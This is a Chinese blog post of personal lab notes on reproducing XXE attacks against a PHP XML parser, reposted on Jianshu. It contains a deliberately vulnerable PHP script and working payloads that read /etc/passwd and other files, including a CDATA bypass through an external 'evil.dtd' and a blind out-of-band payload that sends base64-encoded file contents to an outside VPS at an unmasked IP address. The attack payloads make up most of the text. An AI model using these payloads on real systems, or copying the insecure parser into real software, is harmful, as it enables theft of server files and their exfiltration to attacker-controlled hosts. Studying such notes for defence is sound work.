XXE复现笔记

很早的博客笔记,简书记下,避免丢失。
https://zzqsmile.github.io/2019/08/19/web安全/XXE/XXE/

好记性不如烂笔头,关于XXE还是要记录下自己的学习过程,以后看起来会更清楚,详细原理不再多讲,简单做个实验记录下笔记以便使用。

实验环境

web服务器:10.12.10.198
VPS:     107.182.30.95

实验一:有回显读本地敏感文件(Normal XXE)

web服务器放置解析XML的php代码:
示例代码
xml.php

<?php

    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    $creds = simplexml_import_dom($dom);
    echo $creds;

?>

payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY goodies SYSTEM "file:///etc/passwd"> ]> 
<creds>&goodies;</creds>

结果如下:

image.png

读取文件种可能会有特殊符号如&,<,>,",'等会导致读取失败,比如下面读取含有特殊字符文件2.txt失败:

废话不多说,解决办法有两种:

第一种:将读取文件使用base64编码即可
payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"> ]> 
<creds>&goodies;</creds>

结果如下:


image.png

第二种:将读取数据放在CDATA 标签中输出进行绕过
payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">   
<!ENTITY % goodies SYSTEM "file:///2.txt">  
<!ENTITY % end "]]>">  
<!ENTITY % dtd SYSTEM "http://107.182.30.95/evil.dtd"> 
%dtd; ]> 

<roottag>&all;</roottag>

服务器上放置evil.dtd:

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%goodies;%end;">

结果如下:


image.png

注意:读取文件时候要注意文件以及文件夹权限问题,否则会读取失败,记录下遇到的这个坑吧,在这浪费了不少时间,烧脑~

实验二:无回显读取本地敏感文件(Blind OOB XXE)

xml.php

<?php

libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
?>

test.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://107.182.30.95:9999/?p=%file;'>">

此处需要注意,因为实体值中不能有%,故需要将%转成&#37;或者&#x25;,即正确写法如下:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://107.182.30.95:9999/?p=%file;'>">

或者:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'http://107.182.30.95:9999/?p=%file;'>">

payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://107.182.30.95/test.dtd">
%remote;%int;%send;
]>

在服务器监听端口,发送payload结果如下:

image.png
image.png

以上就是XXE基本利用方式总结笔记,当然XXE的危害还有很多,由于时间原因,暂不记录。

VPS已废,就不打码了。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • (转载)一篇文章带你深入理解漏洞之 XXE 漏洞
    文章转载自https://xz.aliyun.com/t/3357 作者:K0rz3n 一、XXE 是什么 介绍 ...
    Echocipher阅读 5,124评论 0 1
  • XXE学习
    title: XXE学习date: 2019-03-22 20:51:41tags:- XXEcategories...
    Miracle778阅读 8,323评论 0 5
  • XXE漏洞
    XXE漏洞 外部实体注入攻击(XXE) 漏洞简介 XXE漏洞全称XML External Entity Injec...
    Alpenliebe1阅读 3,701评论 0 0
  • XXE漏洞笔记
    外部实体引用 DTD文件用来定义XML文件遵循的规则(格式),而!ENTITY就可实现如同占位符的作用,例如: 此...
    gambr0阅读 6,720评论 0 1
  • 初识XXE及其利用小结
    XML基础知识: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对...
    book4yi阅读 5,075评论 0 1

友情链接更多精彩内容